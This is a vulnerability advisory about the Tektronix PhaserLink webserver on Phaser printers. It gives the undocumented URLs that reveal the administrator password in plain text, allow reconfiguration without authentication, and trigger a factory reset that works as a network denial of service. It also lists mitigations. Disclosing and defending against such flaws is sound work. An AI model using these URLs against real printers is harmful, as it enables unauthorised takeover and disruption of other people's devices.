COMMAND

    Tektronix PhaserLink

SYSTEMS AFFECTED

    Tektronix PhaserLink Webserver

PROBLEM

    Dennis W.  Mattison found  following.   As more  and more  printer
    companies add insecure protocols and daemons to their printers  as
    features to make their machines  more available to the end  users,
    they make their printers more available to exploits by hackers  as
    well.   Unfortunately,  many  of  the  bugs  in these printers are
    available for exploit  since often these  services come turned  on
    by default and little information  is provided up front on  how to
    turn them off.

    Tektronix has a particularly nasty bug which is quite amusing.  On
    their Phaser 740  color printers (they  may be on  other printers,
    but tester had the access  only to this one).   Tektronix packages
    a webserver, built into the printer, to allow an administrator  to
    access  and  change  the  configuration  remotely.   By  opening a
    standard  web-browser  and  pointing  to  the  printer's URL, this
    webserver allows any user  to access the Status  and Configuration
    of the printer.  Luckly,  Tektronix is smart enough to  require an
    administrator password be entered in order to prevent just  anyone
    from changing  the settings  of the  printer (well,  it was a good
    idea,  but  unfortunately  as  we'll  soon  see this administrator
    password is a joke).  Tektronix does recommend that users enter an
    administrator password, and  the manual is  quite specific on  how
    this  is  accomplished  (though  the  manual does state that these
    passwords are sent unencrypted  from the browser to  the printer).
    Unfortunately,  using  some  hidden  and  undocumented  URL's, the
    administrator  password  is  shown  to  anyone without any sort of
    authentication  and  allows  anyone  to  bypass  this  password to
    directly reconfigure the printer, which kinda defeats the  purpose
    entirely.

    To grab the administrator password, just use the URL

        http://printername/ncl_items.html?SUBJECT=2097.

    Presto, the password  appears in plain  text for all  the world to
    see.  Of  course, you can  also change the  administrator password
    here  to  whatever  you  want,  without  needing  to  provide  any
    authentication information.  In a  matter of fact, you can  change
    just about any configuration information in the printer without  a
    user id or password by using the URL

        http://printername/ncl_subjects.html

    and choose one of the  subjects listed.  So, if  the administrator
    went  through  all  the  trouble  of  shutting  down  the insecure
    services  like  telnet  and  ftp  or  put  in  passwords for these
    services,  there  is  nothing  stopping  you  from  going  in  and
    changing these passwords and turning these services back on.   All
    you need to do is  swipe the administrator password, now  you have
    access to all the configuration options on the printer and can  do
    what you please.

    You may even like the fact that you can use the URL

        http://printername/ncl_items.html?SUBJECT=1

    and set  the factory  default setting  to On,  then hit  the "Lets
    change EVERYTHING" button  and voila, a  brand new printer  (and a
    really good  Network DoS,  since it  kills off  the IP address and
    other important networking information).

    An exploit (for just about  anything) is trivial...  This  all was
    confirmed for phaser 780, 840 and 360 (Phaser).

SOLUTION

    1.  Block Port 80 access to this printer via a router or firewall.
        This will prevent access  to this software from  those outside
        the network.  Also, since  very rarely will anyone print  from
        outside the local network, setting the default gateway be  the
        same as the IP address will keep outside users from exploiting
        this service.

    2.  Disable the PhaserLink Webserver on the printer.  This can  be
        accomplished  through  the  control  panel, switching the HTTP
        Protocol to  Disabled (Under  Printer Configuration  | Network
        Settings | HTTP), but it can also be accomplished via the  URL
        http://printername/ncl_items?SUBJECT=2097,  then  switch   the
        setting "On" to off. (We are still testing the printer to make
        sure that this setting permanently disables the  functionality
        of this HTTP server).  However, doing so will prevent you from
        being able to remotely  administer this machine using  the web
        browser.

    There are  other methods,  but these  two appear  to be  the best.
    According to Bernhard Schneck  and Gerhard den Hollander,  the 350
    and 560 printers are not  (confirmed on one of our  printers here)
    vulnerable to this attack.  Phaser 260 seems yo be clean.